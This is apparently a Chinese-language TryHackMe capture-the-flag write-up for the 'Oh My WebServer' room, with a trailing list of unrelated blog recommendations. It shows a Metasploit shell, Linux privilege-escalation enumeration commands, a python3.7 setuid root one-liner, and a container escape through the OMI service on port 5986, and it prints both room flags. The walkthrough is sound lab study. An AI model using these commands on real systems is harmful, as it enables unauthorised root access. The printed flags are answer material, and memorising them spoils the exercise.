[TryHackMe]Oh My WebServer(nday漏洞+容器逃逸)

1.信息收集

nmap扫描

查找相应exploit

2.GetShell

使用msfconsole

设置好参数后getshell

home中没有任何东西

在根目录下有个.dockerenv文件

我们可以判断我们的shell在docker容器中

3.容器提权

Linux提权基本手段:

1.SUID提权 find / -type f -perm -040000 -l 2>/dev/null

2.sudo部分权限 提权 sudo -l

3.修改二进制文件提权 getcap -r / 2>/dev/null

4.查看任务表定时启动文件提权 cat /etc/crontab

5.PATH权限提权 echo $PATH

6.NFS网络文件共享提权 cat /etc/exports

查看二进制文件发现py3.7

复制代码
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'

THM{eacffefe1d2aafcc15e70dc2f07f7ac1}

4.容器逃逸 从root(Docker)到root(主机)

我找找到了

172.17.0.2

编写一个脚本

上传脚本

curl http://IP/1.py

查看开放端口

复制代码
port 22 is open
port 80 is open
port 5986 is open

5986端口正在托管 OMI 服务

复制代码
python3 omi.py -t 172.17.0.1 -c 'cat /root/root.txt'

THM{7f147ef1f36da9ae29529890a1b6011f}

相关推荐
ideal树叶5 小时前
Jenkins和Fastlane的原理、优缺点、用法、如何选择
运维·jenkins
潘潘潘潘潘潘潘潘潘潘潘潘5 小时前
【Linux】Linux开发必备:Git版本控制与GDB调试全指南
linux·运维·服务器·git·学习方法
彻骨寒风5 小时前
在麒麟 ARM (aarch64)安装OpenJDK11和elasticsearchkibana
运维·arm开发·jenkins
DARLING Zero two♡6 小时前
【Linux操作系统】简学深悟启示录:进程控制
linux·运维·服务器
wheeldown8 小时前
【Linux】为什么死循环卡不死 Linux?3 个核心逻辑看懂进程优先级与 CPU 调度密码
linux·运维·服务器·开发语言·c++·unix·进程
xxy.c8 小时前
嵌入式解谜日志-网络编程(udp,tcp,(while循环原理))
linux·运维·c语言·开发语言·数据结构
FreeBuf_9 小时前
普渡外卖机器人存在安全漏洞,黑客可劫持送餐路径
网络·安全·机器人
守.护10 小时前
云计算学习笔记——Linux系统网络配置与远程管理(ssh)篇
linux·运维·服务器·ssh·linux网络配置
博睿谷IT99_11 小时前
以 R1 为视角,手把手教你画 OSPF 最短路径树与推导路由表
网络·华为·智能路由器·华为认证·it·ospf·拓扑图